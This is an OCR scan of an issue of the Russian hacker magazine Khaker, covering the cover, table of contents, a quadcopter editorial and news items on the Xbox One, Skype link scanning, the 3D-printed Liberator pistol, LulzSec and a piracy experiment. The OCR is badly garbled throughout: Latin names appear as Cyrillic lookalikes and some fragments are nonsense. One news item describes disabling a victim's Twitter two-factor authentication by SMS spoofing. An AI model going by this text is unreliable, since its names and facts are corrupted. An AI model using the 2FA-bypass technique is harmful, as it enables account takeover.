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Бонус 

самые интерес 
ные аддоны для 
АКЗгопеі.о 
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Свежие способы 

эксплуатации РНР 
ОЬіесІ Іпіесііоп 
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ЦЕНА: 270 р. 






МЕНЯЕМ 
БАГИ НА БАКСЫ 

Как найти ошибки 

в АпсІгоісІ-приложениях 
и получить за это деньги 





Эти беспилотники скоро изменят мир. 



Но построить такой летательный аппарат можно уже сейчас 


















Интерес к любительской электронике и ЭІУ становится все 
более массовым, и различные игрушки становятся все 
доступнее. На этот раз в центре — мультикоптеры, радио- 
управляемые летательные аппараты. 

Игрушечные вертолеты и самолеты — тема далеко 
не новая, но с появлением выносливых, функциональных 
и расширяемых «взрослых» моделей идея получает прин- 
ципиально новое развитие. Мультикоптеры уже зарекомен- 
довали себя в съемке — с воздуха можно делать отличные 
панорамы и забираться в труднодоступные места для самых 
неожиданных кадров. Если посмотреть тематические фору- 
мы, то уже сейчас есть множество интересных конфигура- 
ций: аппараты на солнечных батареях, автономные машины 
или даже гибриды мультикоптера с гексаподом, способные 
передвигаться как по земле, так и по воздуху. 

Самый простой способ познакомиться с миром этих чуд- 
ных машин — АВ.йгопе Рагго!, известный многим. Как часто 
бываете популярными продуктами в нишевых областях, эта 
модель имеет массу ограничений, отчасти компенсируемых 
большим сообществом и кучей продуктов. Но поскольку лег- 
ких путей мы не ищем, мы рассмотрели и самый трушный 
вариант — сборку собственной модели. 

Удивительно, но, несмотря на всю популярность, сборка 
квадрокоптеров по-прежнему остается непростой задачей. 
Нельзя просто составить список компонентов и давать его 
всем желающим, как это происходит, например, со сборкой 
компов. Одни и те же компоненты могут продаваться под 
разными именами или иметь разные характеристики — все 
это просто не достигло достаточно зрелой стадии. В общем, 
подготовить готовую конфигурацию почти невозможно. 

Но вот объяснить логику при составлении такой конфигура- 
ции вполне реально, что мы и сделали в этом номере. 

Вероятно, через год мы еще раз вернемся к этой теме — 
производители каждый месяц афишируют новые модели 
готовых аппаратов по цене от 50 до 150 долларов. Воз- 
можно, что и здесь появится собственный ВазрЬеггу Рі или 
Агбиіпо — не идеальный, но простой и доступный аппарат, 
который легко адаптировать для своих проектов. 
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ЛАИФХАКИ 
ДЛЯ ИКАРА 

Учимся собирать собственный квадрокоптер 



НЕУСПЕЛ 
ТѴѴІТТЕН ВВЕСТИ 
ДВУХФАКТОРНУЮ 
АВТОРИЗАЦИЮ, 
КАК ЕЕ ТУТ ЖЕ 
НАУЧИЛИСЬ 
ОБХОДИТЬ 




КРЫЛАТЫЕ 

ДРУЗЬЯ 

Бюджетные квадрокоптеры 



ХИТ В НЕБЕ 

АН.Огопе 2.0 и самые популярные 

аддоны для него 



002ИРР, 

СООСНОВАТЕЛЬ ОИ8ЕС 



Заработать можно на чем угодно. Если ты хочешь денег , 
ты вряд ли станешь заниматься безопасностью — 
это, пожалуй, самый трудоемкий и глупый способ : ) 
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МЕСАЫЕѴѴЗ 
КОЛОНКА СТЁПЫ ИЛЬИНА 
РВООР-ОР-СОИСЕРТ 
ЛАЙФХАКИ ДЛЯ ИКАРА 
КРЫЛАТЫЕ ДРУЗЬЯ 
ХИТ В НЕБЕ 
БЕЛАЯ ШЛЯПА 
ТРУБНЫЙ РЕБЕНОК 
В ДЕБРЯХ ВЕОЭІТ 
СВИТА КОРОЛЯ 
МАЛЕНЬКИЙ СИЛАЧ 
НАЧАТЬ С КОНЦА 
ЕА5Ѵ НАСК 
ОБЗОР ЭКСПЛОЙТОВ 
1000 $ НА ВЗЛОМЕ ПРИЛОЖЕНИЙ 
ИНСТРУМЕНТАЦИЯ - ЭВОЛЮЦИЯ АНАЛИЗА 
НОРМАЛЬНЫЕ ГЕРОИ ВСЕГДА ИДУТ В ОБХОД! 

КОЛОНКА АЛЕКСЕЯ СИНЦОВА 
СТАРЫЙ НОВЫЙ 1Ш8ЕШАИ2Е 
ГРУЗИТЕ ФАЙЛЫ ПАЧКАМИ! 

Х-ТООЬЗ 
ДЕТЕКТИМ ВИРТУАЛКИ 
ЗАДАЧИ НАСОБЕСЕДОВАНИЯХ 

КУШАТЬ ПОДАНО! 

АГІСІЛ.АЯІ8: ФРЕЙМВОРК, КОТОРЫЙ НАМ НРАИЦА 

ПРАВИЛЬНАЯ МНОГОПОТОЧНОСТЬ 
ПУБЛИЧНАЯ ПОРКА ПИНГВИНА 
ОГНЕННЫЙ ЗАНАВЕС 
БУБЕН НА ПРОКАЧКУ 
СПОСОБНЫЕ ПОДМАСТЕРЬЯ 
РАБОЧИЕ ЛОШАДКИ 

РАО 

ДИСКО 

шт 







Все новое за последний месяц 

Как я учил ВиЬуоп Яаііззатри ночи. Итаки не выучил 

Смартфоны с камерами как детектор грязной бомбы 
Как спроектировать собственный квадрокоптер 

Бюджетные квадрокоптеры 

АН. Этапе 2.0: обзор возможностей и дополнений 

Интервью с известным российским ѵіМебаІ'ом сІОіпрр 

Как объединять веб-сервисы в новые инструменты 
Откуда начать читать 

Обзор гтшзі йаѵе инструментов для рутованного АпбгоісІ 

Или как выжать максимум из мини-компа на базе Апбгоіб 

Обзор 5опу Хрегіа 2 

Хакерские секреты простых вещей 

Анализ свеженьких уязвимостей 

Ищем уязвимости в Апбгоісі-приложениях Яндекса 

Система Ріп на вооружении 

Руководство по лечению сертифицированной криптографии в банковских приложениях 
Зачем вам ЕМЕТ 

Свежие способы эксплуатации РНР ОЬ)ес1 Іп|ес1іоп 

Заливаем полезную нагрузку на машину под управлением ѴѴіпсІоѵѵз 

7 утилит для исследователей безопасности 

Определяем факт запуска приложения в различных системах виртуализации 
Подборка интересных заданий, которые дают на собеседованиях 
Используем Сшпідля облегчения жизни фронтенд-разработчика 
Новая жизнь старого ЛаѵаЗсгірІ, к которому тоже приложилась корпорация добра! 

«Да» - плавности, «нет» - блокировкам! 

Обзор самых опасных, неоднозначных и дурацких уязвимостей в ядре Ііпих 
Новые и малоизвестные возможности ІрІаЫез 
Погурманим? Необычные рецепты в помощь админам 

Обзор полезных дополнений и инструментов для популярных приложений МуЗОЦ Ыадіози Зпогі 
Сравнительное тестирование ноутбуков средней ценовой категории на базе ѴѴІпсіоѵѵз 8 
Вопросы и ответы 
8,5 Гб всякой всячины 
Удобные ѵѵеб-сервисы 




























Мария «МіГгіІІ» 
Нефёдова 

ті1гіІ@геаІ. хакер, ги 




НОВЫЙ 

МІСВ050РТ ПРЕДСТАВИЛА НОВЫЙ ХВОХ И КШЕСТ 





ажется, переплюнуть презентацию РІауЗіабоп 4 
по странности не могло уже ничто: говорить о кон- 
соли три часа, так и не показав консоль, тоже нужно 
уметь. МісгозоИ: консоль все-таки показала, но шоу 
все равно оказалось странным. 

Большая часть часовой презентации XI была 
посвящена «новому видению мультимедиа» 
от МісгозоЙ, и фокус делался на том, как консоль 
сможет управлять телевизором и различными приставками 
кабельного и спутникового телевидения. Вместо того чтобы по- 
казать, как новое железо и облачная инфраструктура позволят 
создавать игры нового поколения, МісгозоЙ показала трейлеры 
с рендерами игр (не показывая сам игровой процесс). Да и вы- 
бор игр не впечатлил, ведь спортивные игры от ЕА и очередная 
СаІІ оі Биіу — не самая большая сенсация на свете. 

Цена устройства пока неизвестна, но технические харак- 
теристики огласили. Консоль работает на восьмиядерном 
СРІІ/ОРи, оснащается 8 Гб ОЗУ БОРІЗ, приводом ВІи-гау, вин- 
честером на 500 Гб, интерфейсом ІІВВ 3.0 и поддержкой про- 
токола ѴѴі-Рі Бігесі. В качестве процессора используется АРУ 



У геймеров презентация оставила странные 
впечатления : почему, представляя новую кон 
соль, МісгозоЯ почти не говорила об играх? 



семейства АІѴЮ КаЬіпі. Как предполагают аналитики 
АпапсГСесіі, это конфигурация из двух четырехъядер- 
ных процессоров, работающих на частоте 1,6 ГГц, 
но официально это подтверждено не было. 

Если вспомнить презентации консолей прошло- 
го поколения, тогда МісгозоТС и 5опу действительно 
было чем удивить: игры на больших НЭ-телевизорах 
в то время были в диковинку. Даже сейчас, несмотря 
на то что железо обеих приставок безнадежно уста- 
рело, разработчикам по-прежнему удается удивить 
игроков — ведь на большом экране все выглядит 
по определению лучше. С новым поколением такого 
резкого скачка продемонстрировать не удалось — 
возможно, поэтому разработчики предпочли в пер- 
вую очередь говорить о мультимедиа. 

У приставок остался козырь в виде облачных 
вычислений. Місгозой даст разработчикам доступ 
к платформе ѴѴіпсІоѵѵз Агиге, на которой можно об- 
считывать по крайней мере те элементы графики, 
которые не требуют частого обновления (например, 

пейзажи). У Зопуже собствен- 
ная платформа Ѳаікаі. Инте- 
ресно, что произойдет, когда 
в конце года на рынок выйдут 
ЗіеатЬох, ведь Ѵаіѵе на игро- 
вых сервисах уж точно собаку 
съела. 



ХВОХОЫЕ 

Сенсор Кілесі: он те- 
перь сн и м ает видео 
1080р; обрабатывая 
поток 2 Гбит/с, лучше 
понимаетжестыи... 
сможет распознавать 
выражение лица, 
сердцебиение геймера 
и даже определять его 
центр тяжести. Более 
того, без Кт есі систе- 
ма работать не будет, 
и он всегда должен 
быть включен. В том 
числе камера и микро- 
фон. Якобы в ожидании 
команды от пользова- 
тели. Верим-верим. 



Иллюстрация: Майя Арутюнова 
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ОБХОД 

ДВУХФАКТОРНОЙ 

АВТОРИЗАЦИИ 

ТѴѴІТТЕВ 

СТАРЫЙ МЕТОД ДЛЯ НОВЫХ РЕШЕНИЙ 



П осле недавней череды громких взломов аккаунтов 

вТѵѵійег {от рук хакеров за последние месяцы пострада- 
ли Аззосіаіесі Ргезз, ТЬе Сиагсііап и АРР) сервис наконец 
ввел в строй систему двухфакторной авторизации. Од- 
нако спустя пару дней после этого события в Сети уже 
появилась информация о том, что ее можно обойти. 

Подробную статью о возможных уязвимостях системы опубли- 
ковал Шон Салливан из компании Р-5есиге. Двухфакторную аутен- 
тификацию в ТѵѵіДег можно подключить или отключить одновремен- 
но с услугой получения твитов на мобильный телефон. Здесь-то 
и кроется загвоздка. Давно известно, что отправка твитов на мо- 
бильный легко поддается ЗМ 3-спуфингу. По сути, для прекраще- 
ния услуги нужно просто отправить ЗМЗ со словом ЗТОР на номер 
ТѵѵіНег в своей стране, указав в качестве обратного телефона номер 
жертвы. Вуаля, у жертвы отключилась доставка твитов на телефон 
и/или двухфакторная авторизация. Салливан не поленился проте- 
стировать свою теорию и оказался абсолютно прав. Путем описан- 
ных манипуляций ему удалось без проблем отключить двухфактор- 
ную авторизацию на чужом аккаунте. 

В своей статье Салливан также отмечает, что люди, использую- 
щие двухфакторную систему авторизации, обычно чувствуют себя 
защищеннее, расслабляются и выбирают очень простые пароли. 
А значит, их опять же будет проще взломать. 




Кстати, ТшіНег теперь 
в режиме реального 
времени отслеживает 
по записям пользова- 
телей, какие телепро- 
граммы они смотрят, 
и соотносит ото 
с данными о рекламе 
в эфире. После чего 
демонстрирует поль- 
зователю ту рекламу, 
котору ю тот тол ько 
что видел. 




ЧИТАЕТЛИНАС 

МІСРОЗОЕТ? 



СНОВА 

П Вгч 



п л л 
К | ' Г 




РОС О БЕЗОПАСНОСТИ И ЗАЩИЩЕННОСТИ 




Н а этот раз интерес к проблеме потенциальной незащищенно- 
сти Зкуре-чата продемонстрировали немецкие исследователи, 
а именно издательский дом Неізе. Снова МгсгозоИ подозревают 
в слежке за пользователями. 

Известно, что несколько юзеров провели опыт: принялись об- 
мениваться ссылками в Зкуре, как в открытую, так и специально модифици- 
руя их различными ЭРБ-сократителями, через ^ѵаЗсгірІ и иными способами. 
Выяснилось странное: периодически ссылки доходили до адресата в изме- 
ненном или сокращенном виде, успевая по пути видоизмениться. Предста- 
вители Неізе утверждают, что подобное невозможно провернуть, «не заглянув 
внутрь чужого сообщения» тем или иным путем. Собственное расследование 
журналистов показало, что в процессе каким-то образом задействован сер- 
вер, поддерживающий маршрутизацию сообщений и работающий по 1Р- 
адресу 65.52.100.214. Этот ІР входит в сеть, принадлежащую МісгозоТС. 

В МісгозоТС прокомментировали ситуацию, сообщив, что действительно 
«читают» сообщения, но исключительно У Я !_-фил ьтром , который ищет вре- 
доносные ссылки. Сам фильтр якобы даже не переходит по линкам, а лишь 
сверяет их с базой. 



Му5С|І_! 





— > ѴѴікіресІіа решила отказаться 
от использования МуВОБ, ее 
заменит МагіайВ. Более того, ос- 
новная часть бесшовной миграции 
МуЗСЗБ — МагіаОВ уже выполнена. 



Первый в мире видеокодек, 
созданный на базе иаѵаЗсгірі 
иѴѴеЬСБ, представили МогіІІа 
РоипбаНоп и компания ОТОУ Кодек 
ОЯВХ.із был написан как замена 
И. 264. 



А Віісоіп и ѴѴеЬМопеу по- 
дружились. Теперь в кошельках 
ѴѴеЬМопеу появится поддержка 
ввода, вывода и конвертации ВС. 
1 ѴѴМХ равен 0,001 ВТС. 



Билл Гейтс снова объявлен 
самым богатым человеком пла- 
неты, согласно рейтингу ВІоотЬегд 
ВіІІіопаігез Іпсіех. Его состояние 
оценивается в 72,7 миллиарда 
долларов. 







в 



МЕСАЫЕМЗ 



ДРОНЫ НУЖНЫ 
НЕТОЛЬКО 
ВОЕННЫМ 

ИНТЕРЕСНЫЙ И ДОБРЫЙ СТАРТАП 

К ак правило, беспилотные летательные аппараты 

фигурируют в новостях рядом со словами «армия», 
«патрулирование», «опасные зоны» и так далее. Ис- 
следователи из научно-исследовательской лабора- 
тории при Университете сингулярности видят дро- 
нов под другим углом и хотят использовать их в мирных целях. 

Так и появился на свет стартап под названием МаТСегпеТ 

Идея проста — использовать беспилотники для транспорти- 
ровки грузов. Да, разумеется, один дрон может поднять всего 
пару килограммов и пронесет их лишь несколько километров 
{десять максимум). Именно для этого ученые и хотят постро- 
ить целую сеть зарядных станций на солнечных батареях, рас- 
положенных на расстоянии не более 10 км друг от друга. Летая 
между ними, дроны смогут заменять старые аккумуляторы или 
подзаряжаться. 

И это не только концепт или идея: сеть Майегпеіуже прошла 
пробные испытания на Гаити и в Доминиканской Республике, 
дополнительные тесты запланированы на ближайшее время. 





Так как воздушное 
пространство во всем 
мире давно поделе- 
но, ученые плани- 
руют организовать 
оперативный центр 
для наблюдения за все- 
ми беспилотниками 
в реальном времени, 
чтобы своевременно 
информировать власти 
о пролетающих над 
ними дронах. 




С1 августа С оодіе перей- 
дет на 2048-битные ключи 

шифрования при работе с ЗЗІ_- 
сертификатами. Пока сеансовые 
данные шифруют ключами длиной 
1 Кбит. 



- - Компания Ѵаіюо! решила 
«омолодить» свою аудиторию 

и покупает ТиплЫг за 1,1 миллиар 
да долларов. В компании пообе- 
щали «не облажаться». ѴаМ оо ! до 
сих пор припоминают Ніскг. 




ИЗРАРЮЗНАРЕ 



Некогда популярнейший файловый 
хостинг сегодня испытывает серьезные 
трудности. РарісІЗііаге были вынуждены 
сократить штат компании с 60 до 15 
человек. Сейчас сайт находится всего 
на 621 -м месте среди файловых хостин- 
гов, по данным АІеха. 



ДОБРОВОЛЬЦЕВ 
ХОТЯТ НА МАРС 



Голландская организация Магз Опе, 
решившая первой доставить людей 
на Марс (в частном порядке), преуспе- 
вает. Уже 78 тысяч добровольцев хотят 
попытать счастья, получив билет в один 
конец. Все эти люди уже заплатили по 38 
долларов вступительного взноса. Будет 
на что строить на Марсе базу и космиче- 
ские корабли! 



СОТРУДНИКОВ 

УВОЛЕНО 
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РАСПЕЧАТАЙ 
П И СТОЛ ЕТ 




ЫВЕВАТОК - ОРУЖИЕ, КОТОРОЕ МОЖНО РАСПЕЧАТАТЬ ДОМА, НАЗО-ПРИНТЕРЕ 




га 

ш 

о 




к 

>3 

га 





Тем временем в Калифорнии 48-летний Джефф Хизель, автор популярного канала ТаоЛесІегшаие 
на ѴоиТиЬе, научился печатать на ЗР-принтере ЗоІісіоосІІе 3 пластиковые пули для дробовика 
МоззЬегд 590. Даже самая маленькая среди напечатанных из обычного пластика пул ь с легкостью 
пробила деревянную доску с десяти метров. 



К ажется, люди, громко кричавшие о том, что 30-принтеры могут быть опасны, 

оказались не уж так далеки от правды. Оружейные детали, пригодные к исполь- 
зованию, научились печатать уже сравнительно давно. Теперь научились печа- 
тать оружие в целом. 

иЬегаІог (освободитель) — первый в мире пластиковый пистолет, все де- 
тали которого отпечатаны на 30-принтере. Его создали в некоммерческой организации 
РеТепзе ОізІхіЬШесІ, чей глава Коди Уилсон называет себя анархистом и радикальным ли- 
бертарианцем. Пистолет состоит из 16 частей, каждая из которых была распечатана авто- 
рами на принтере Оітепзіоп 53Т с использованием АВВ-пластика. Повторить это можно 
практически на любом 30- принтере. Металлический в оружии только боек, для которого 

использован обычный гвоздь. Лишь одна 
эта крохотная деталь не может быть соз- 
дана на принтере. И этот кусочек металла, 
в общем-то, нужен скорее для обнаружения 
оружия металлодетекторами, в соответствии 
с американским ЫпсІеІесІаЫе Рігеагтз Асі. 
Кроме того, ЫЬегаіог может стрелять патро- 
нами разного калибра, так как создатели 
предусмотрели возможность смены некото- 
рых частей. Здесь стоит отметить, что у ком- 
пании Ре^елэе ОізІгіЬиІесІ лицензия на произ- 
водство огнестрельного оружия есть, с этой 
стороны все законно и честно. Также по зако- 
нам США гражданин имеет право изготовлять 
у себя дома оружие для собственных нужд. 
Однако кто гарантирует, что печатать писто- 
леты будут только в США, и кто проконтроли- 
рует этот процесс? 

Чертежи (то есть САО-файлы) ЫЬегаІог были опубликованы в открытом доступе, на сай- 
те Іе ’ГсасІ.ога . Конечно же, на компанию Ое^епзе ОізІгіЬіДесІ и саму идею тут же обрушил- 
ся шквал критики и негодования. Ведь пластиковое оружие почти невозможно обнаружить 
(можно попросту не вставлять металл в пистолет), а картина подпольных фабрик, печата- 
ющих оружие на 30-принтерах, вдруг стала пугающе реальной. Правительство США среа- 
гировало довольно быстро: на данный момент от файлов на сайте осталась лишь надпись, 
гласящая, что госдепартамент США, занимающийся регулированием торговли оружием, 
потребовал убрать данные из открытого доступа. Стоит ли говорить, что пользователям 
это не понравилось? В пику властям люди организовали торрент-раздачи файлов, заяв- 
ляя, что готовы сидировать их просто из принципа. Обсуждение на гескМ собрало больше 
трех тысяч комментариев и вышло одним из самых жарких в этом месяце. Но, как извест- 
но, что попало в интернет, то останется там навсегда. «Удалять» данные поздно. Зато теперь 
в США могут запретить пластиковое оружие. 



«Везде, где есть 
компьютер и ин- 
тернет, может 
появиться пи- 
столет», — с гор- 
достью заявил 
в интервью ТогЪез 
Коди Уилсон 




ВИРТУАЛЬНЫЕ 
УГОНЩИКИ НЕ ПРОЙДУТ 

— ^ У соседей в Белоруссии очень серьезная киберпо- 
лиция. Недавно их «управление К» вернуло 30-лет- 
нему военному угнанный у него танк. Да-да, танк был 
виртуальный, изѴѴогісі оІТапкз. Угонщик оказался 
школьником, которому теперь грозит штраф за угон 
премиум-танка ценой 35 долларов. 




НУЖНЫ ЛИ БОКСОВЫЕ 
ВЕРСИИ? 

АбоЬе Зузііетз сделали важное заявление — ком- 
пания решила отказаться от дистрибуции продуктов 
коробочными продажами, перейдя на облачную 
модель по подписке. Интересно, что почти одно- 
временно с этим МісгозоТС сообщила, что, напротив, 
не собирается прекращать продажи коробок. 




ШІІХНАОРБИТЕ 

— ^ Все компьютеры локальной сети на МКС были 
переведены сѴѴІпбоѵѵзХР, на которой работали до не- 
давнего времени, на ОеЫап. Сделали это из сооб- 
ражений безопасности. Впрочем, стоит отметить, 
что Упихтак или иначе используется на орбите с 1998 
года, с самого запуска МСК. 
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«УРОВЕНЬ ПИРАТСТВА 
СЛИШКОМ ВЫСОК!» 

ГЕЙМ -ДЕВЕЛ ОПЕРЫ ПОПЫТАЛИСЬ ДОСТУЧАТЬСЯ ДО ИГРОКОВ 
НЕОБЫЧНЫМ СПОСОБОМ 




мешная, грустная и вместе с тем поучительная история произошла в прошлом 
месяце. Разработчики попытались наглядно продемонстрировать игрокам, 
как это обидно и неприятно, когда пиратство убивает твой бизнес. 

Небольшая инди-студия Огеепбеагі: (Затее завершила работу над новым 
проектом — игрой бате Реѵ Тусооп. Это бизнес-симулятор игровой студии, 
где действие начинается с самой зари игровой индустрии — 80-е годы, гараж, разработка 
текстовых игр и двумерной графики. Заканчивается игра созданием ММО, бестселлеров, 
своей компанией и даже выпуском собственной консоли. Однако добраться до победного 
конца удалось немногим, большинство игроков уперлись в странную проблему — высокий, 
просто непомерный уровень пиратства, который задушил их бизнес. Оказалось, это был 
совсем не баг и не недоработка, просто авторы игры решили провести эксперимент. 

Вместе с платной версией симулятора (цена которой составляет всего 7,99 доллара) 
Сгеепі'геагі: Оатез создали «крякнутую», якобы пиратскую версию Оате Реѵ Тусооп, с не- 
большими изменениями. И тоже выпустили ее в Сеть. Жадные до халявы пользователи 
принялись активно качать игру уже через минуту (!) после регистрации раздачи на трекере. 
А дальше разработчикам осталось только наблюдать за реакцией... 

Возмущение и непонимание последовали в тот же день. На игровых форумах и даже 
в Зіеат люди начали жаловаться на то, что какая-то непонятная проблема не дает им про- 
двигаться в игре. Этой проблемой, как ты понимаешь, был чрезмерно высокий уровень пи- 
ратства. Должно быть, разработчики здорово повеселились, наблюдая за тем, как пользо- 
ватели искренне расстраиваются, когда их игра получает высокие оценки, но ее «все равно 
воруют». Некоторые игроки даже интересовались, нельзя ли использовать в игре какие-то 
схемы ЭВМ или нечто подобное. Другие просто возмущались: «Почему среди людей так 
много пиратов? Из-за них я банкрот!» В общем, халявщики наивно искали решение «про- 
блемы» и злились, совершенно не замечая бревна в собственном глазу. 

Итоги эксперимента оказались печальными. Конечно, продажи получились мизерными. 
Но быть может, этот эксперимент хоть чему-то нас научит? 



Игроки интересовались, нельзя ли исполь- 
зовать в игре какие-то схемы ДКМ. Другие 
просто возмущались: «Почему среди людей 
так много пиратов? Из-за них я банкрот!» 




ЕЩЕ ОДИН НЕДОСТАТОК 
ѴѴІИ8 

— ^ Новозеландский сотрудник «Лаборатории Ка- 
сперского» Уэйн Кирби выступил с критикой в адрес 
ѴѴіпсІоѵѵз 8. По его мнению, система излишне сложна, 
что делает ее более уязвимой. «Система содержит 
в себе сразу три платформы, что открывает путь к зна- 
чительно более широкому фронту атак». 




ЧЛЕНАМ ШЕ23ЕС 
УЖЕ НЕ СМЕШНО 




На создание Оате Реѵ 
Тусооп у студии ушел 
год. Лицензионную 
версию установил и 214 
человек, а «пират- 
скую» — 3104 человека, 
то есть уровень пират- 
ства составляет 93,6%. 
Что и требовалось 
доказать. 
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— ^ Четверым хакерам из группы І_иІ2$ес, ранее при- 
знавшим себя виновными, вынесли приговор. Бри- 
танский суд приговорил их к тюремному заключению 
на срок от 20 до 32 месяцев. Любопытно, что послед- 
него участника группы (Аѵипй) так и не могут найти. 
Его ищут спецслужбы, но он как в воду канул. 




НЕ«ГИФ», А«ДЖИФ» 

— т> Автор формата ОІР Стив Уилхайт дал интервью 
изданию ІМеіл/ѴогкТітез и сделал неожиданное за- 
явление. Оказывается, все эти годы мы ошибались, 
произнося слово как «гиф». Правильно «джиф» [631Т]. 
Даже «Оксфордский словарь английского языка», до- 
пускающий оба произношения, заблуждается. 
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ПУБЛИКУЙ 

УЯЗВИМОСТИ 

НАЗЛО! 

СРАЗУ ДВУХ БЕ30ПАСНИК0В ОБИДЕЛО НЕВНИМАНИЕ 
К НАЙДЕННЫМ ИМИ ДЫРКАМ 



то время как мы рассказываем о рынке продаж уязви- 
мостей, о том, какие деньги на этом делают компании 
и частные лица, некоторые граждане публикуют «дырки» 
в открытом доступе и совершенно бесплатно. Руководят 
ими желание насолить и обида. 

Первого исследователя еще можно понять — он 17-летний 
школьник. Его зовут Роберт Куглер, и он нашел на сайте РауРаІ Х53- 
уязвимость. Вызвать баг можно через встроенную функцию поиска, 
вставив три строки на ЗаѵаЗсгірІ. Парень честно попытался связать- 
ся с РауРаІ через форму для профессионалов и получить деньги, 
но получил лишь ответ: «К участию в программе Вид Воипіу допу- 
скаются лица не моложе 18 лет». Тогда Куглер обиделся и опублико- 
вал все данные в открытом доступе (5есПзІ5.ога/ТиіІсІі5сІовиге/2013/ 
Маѵ/163 ). 

Второй случай понять сложнее. Инженер Соодіе Тевис Орманди 
обнаружил баг в ѴѴілсІоѵѵз 7 и 8, позволяющий локальному пользо- 
вателю получить неположенные ему системные полномочия. Уда- 
ленно эту брешь использовать нельзя, поэтому она не слишком 
критична. Орманди попытался донести информацию о найденной 
дырке до МісгозоТС, но лишь выяснил, что там к этому относятся 
недружелюбно, помогать не хотят, и дела с ними вести совершен- 
но невозможно. Обо всем этом Орманди рассказал в своем блоге 
и в открытую опубликовал данные о найденном баге (весіізіз.огсі/ 
1"иІІсіІ5СІозиге/20іЗ/Мау/91). 

Конечно, не все баги 
публикуются «назло» 
разработчикам. К при- 
меру, датская компания 
Зесипіа в этом месяце 
разгласила 0-сІаудля 
программы ЕВРАЗ 
ЕВ Ѵіеѵѵег случайно. 
Информация о дырке 
и эксплойт попали в от- 
крытую рассылку «из-за 
срабатывания функции 
автозаполнения в по- 
чтовой программе». 




ИНОГДА ОНИ ПРОПАДАЮТ 

ПРОЕКТ СОБРАЛ 196 ТЫСЯЧ ДОЛЛАРОВ НА КІСК8ТАЙТЕК И ИСЧЕЗ 

азработчики Сгуріекз ІІЗВ еще в декабре 2011 года собрали нема- 
лую сумму 196 404 доллара для реализации своего проекта флеш- 
ки-криптекса с аппаратным шифрованием. 

Сгуріекз УЗВ выглядел красиво на картинках, да и сама идея 
защищать флешку с помощью кодового криптекса очень понрави- 
лась посетителям Кіскзіагіег, так что 989 человек не пожалели денег, чтобы 
заказать 1, 2, 5 или 10 таких устройств. 

Один из покупателей даже заказал комплект из 25 гаджетов за 3750 дол- 
ларов. Теперь всем этим оптимистам остается только кусать локти: авторы 
рендеров, собрав деньги и заказы, некоторое время общались со своими 
«клиентами», но потом им надоело, и с апреля 2013 года представители ком- 
пании Сгурігасіе Іпс. окончательно исчезли с горизонта, перестали отвечать 
на письма и звонки. Обманутые «дольщики» разделились на два лагеря: мол- 
чаливое большинство мысленно попрощалось с деньгами, а небольшая груп- 
па активистов пишет письма по инстанциям и надеется вернуть средства. 
Судя по сообщениям для «дольщиков», компания пыталась осуществить воз- 
врат средств, но то ли не завершила, то ли не начала этот процесс. 

Неудивительно, что после таких историй руководство КіскзШПег сильно 
ужесточило правила для новых проектов. Среди прочего с прошлого года за- 
прещено публиковать рендеры, разрешены только фотографии реально име- 
ющихся прототипов. 







департамент образования не- 
мецкого города Шверин. Просто 
машины были заражены СопТіскег, 
а антивирусы, видимо, для дура- 
ков. 



Возможно. Компания Оиапіеппа 
анонсировала чип, ориентиро- 
ванный на мобильные девайсы, 
созданный путем модификации 
802.11ас. 



РРоЗ-атака 300 Гбит/с 
не прошла даром. Свен Олаф 
Кампхейс, один из руководителей 
СуЬегВипкег, арестован в Испании 
и отправлен в Нидерланды, где его 
ждет суд. 



1,3 миллиона игроков 
потеряла ММОРПГШогШ оТ 
ѴѴагсга^і в первом квартале этого 
года, согласно данным ВІіггагсІ. 
Теперь играют лишь 8,3 миллиона 
человек. 
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МЕСАЫЕМЗ 



БЫЛ РЕБОРД, 
СТАЛ РЮОРА 

НЕОДНОЗНАЧНОЕ ПЕРЕИМЕНОВАНИЕ ИЗВЕСТНОГО ДИСТРИБУТИВА 



Н астоящая комедия разыгралась в про- 
шлом месяце вокруг популярного дис- 
трибутива Ресіога. Дело в том, что разра- 
ботчики решили переименовать проект 
Ребога для РІазрЬеггу Рі и выбрали очень 
неблагозвучное для русскоязычной публики назва- 
ние — Рібога. Конечно же, новое имя вызвало нема- 
лый резонанс и потоки юмора разной степени тяже- 
сти в СМИ, форумах, блогах и так далее. Пожалуй, 
любой дистрибутив Ыпих мог бы гордиться таким 
вниманием прессы и такой рекламой :). 

Оказалось, все ключевые разработчики этого 
билда для архитектуры АНМѵб живут в Канаде и сре- 
ди них нет русскоязычных. Однако известие о том, 
что название вышло не слишком удачным, до них 
вскоре докатилось. На официальном сайте проекта 
в итоге появилось сообщение: «Пожалуйста, прими- 
те наши извинения, если мы нанесли вам оскорбле- 
ние. Мы лишь хотели связать „Пи” (от РазрЬеггу Рі) 
и „Федора" (из проекта Ребога). Мы активно ищем 
приемлемое для всех альтернативное русское на- 
звание и консультируемся с некоторыми членами 
сообщества. Вскоре опубликуем дополнительную 
информацию по этому поводу». 




Тем временем в инфра- 
структуре Ре йо га нашли 
ошибки в системе управ- 
ления аккаунтами разра- 
ботчиков, о чем сообщил 
лидер проекта Робин 
Бергерон. В итоге могла 
произойти утечка да иных, 
среди которых могли быть 
хеши паролей (5НА-512 
с солью) , секретные во- 
просы, зашифрованные 
ответы для восстановле- 
ния пароля и персональ- 
ные данные. 




Рісіога із а Ребога Нетіх оріітігегі Іог іГіе РЕазрЬеггу Рі сотриіег. 



ОошпЭоасІ 

ІгаіаІ аЦоп ч’ыіг^сг цпо 
РаЕ рЬеггѵР^ огй Роѵ^піо з^ з (Сотігкз азогО 
Мкготегі ІЗі'ес? Скшпіоасі 
ІЧгіога.са □ гее! ВсжпІ-саеІ 



ІпГаггоаІіоп 

РИО і ІЙ Р А. - 1 ...:Т ЭПШПІ 

Рісіста ѴА 
Рйо га Керр зііогу 
оплі Усвое 



Тесіого® 




Но5Ііпд соигіеву 

В! ЫиеЬозт 




— ^ Ученые университета Кон- 
нектикута выяснили: у игроков 

Оиаке 3 НеѵоІШіоп резко повы- 
шается уровень агрессии, если 
их противник человеческой расы. 




— > Теперь распознаванием 
образов на фото и видео, за- 
гружаемых в Ооодіен-, занимается 
мощная самообучаемая нейросеть. 
И заметим, у нее отлично полу- 
чается. 




га 
й I 



І|КЯ 

гШЩшл 



30, 40? Они еще не успели стать 
до конца привычными, но уже устаревают. 
Компания Затзипд провела испытание 
беспроводной передачи данных уже пятого 
поколения. Удалось послать данные на ско- 
рости более 1 Гб/с на расстояние два кило- 
метра. Для коммерческого использования 
50 станет доступна не ранее 2020 года. 



ДОЛЯ 



ТОРРЕНТ- 



ТРАФИКА 



ВМИРЕ 



